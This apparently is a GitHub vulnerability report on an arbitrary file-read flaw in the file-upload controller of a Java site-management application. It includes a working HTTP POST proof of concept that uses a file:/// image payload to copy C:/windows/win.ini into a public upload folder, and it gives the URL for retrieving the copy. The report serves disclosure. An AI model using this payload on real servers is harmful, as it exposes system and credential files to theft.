You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Code Audit:
The doContent method in src/main/java/com/mysiteform/admin/controller/system/FileController. java does not filter the incoming content
Follow up with uploadLocalImg, the general process is to read the file based on the passed file name, and then upload it to the static/upload/directory
Vulnerability exploitation:
POST /file/doContent HTTP/1.1
Host: 192.168.52.132:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Cookie: JSESSIONID=b566f4d3-be2c-45a5-b4a6-f9e3d35e7b11
Content-Length: 46
content=<img src="file:///C:/windows/win.ini">
Code Audit:
![image](https://private-user-images.githubusercontent.com/101814165/398430240-b132c49c-7fd4-4b3e-825d-cba9f522c9ff.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mzk1ODAwOTIsIm5iZiI6MTczOTU3OTc5MiwicGF0aCI6Ii8xMDE4MTQxNjUvMzk4NDMwMjQwLWIxMzJjNDljLTdmZDQtNGIzZS04MjVkLWNiYTlmNTIyYzlmZi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjE1JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxNVQwMDM2MzJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zNzljYTFlYzE2NzE4ODgyZTk4M2EyMDZjYzY4NzY4ZWQ2NDQ3MDdhZTdlNWZlNDdiNTkwYjI1ZGNmZmZjMTkzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.Or2_zRK7PC4kjBoOxl13GnmQl62rVmn2YwM1fz-aIt8)
![image](https://private-user-images.githubusercontent.com/101814165/398430272-e094da6c-a70f-40f1-ac14-827fe3ad2501.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mzk1ODAwOTIsIm5iZiI6MTczOTU3OTc5MiwicGF0aCI6Ii8xMDE4MTQxNjUvMzk4NDMwMjcyLWUwOTRkYTZjLWE3MGYtNDBmMS1hYzE0LTgyN2ZlM2FkMjUwMS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjE1JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxNVQwMDM2MzJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT03NDhjNWU3ZDY5ZGEyN2U1NmRhMzU0Y2ZkMDgzMTA1MmE5MWYxMjkwMmI2ZGIwNDc2MGMwOWY0MjBiNjA3OGJjJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.XJZg8oMAFCw7MkcMxHpdJO30h3p7omt6DUpfxzOR_3Y)
The doContent method in src/main/java/com/mysiteform/admin/controller/system/FileController. java does not filter the incoming content
Follow up with uploadLocalImg, the general process is to read the file based on the passed file name, and then upload it to the static/upload/directory
Vulnerability exploitation:
Open and return: http://192.168.52.132:8080/static/upload/00a4a07c -9023-45e4-8229-8f3f0ddcfccd.ini
The text was updated successfully, but these errors were encountered: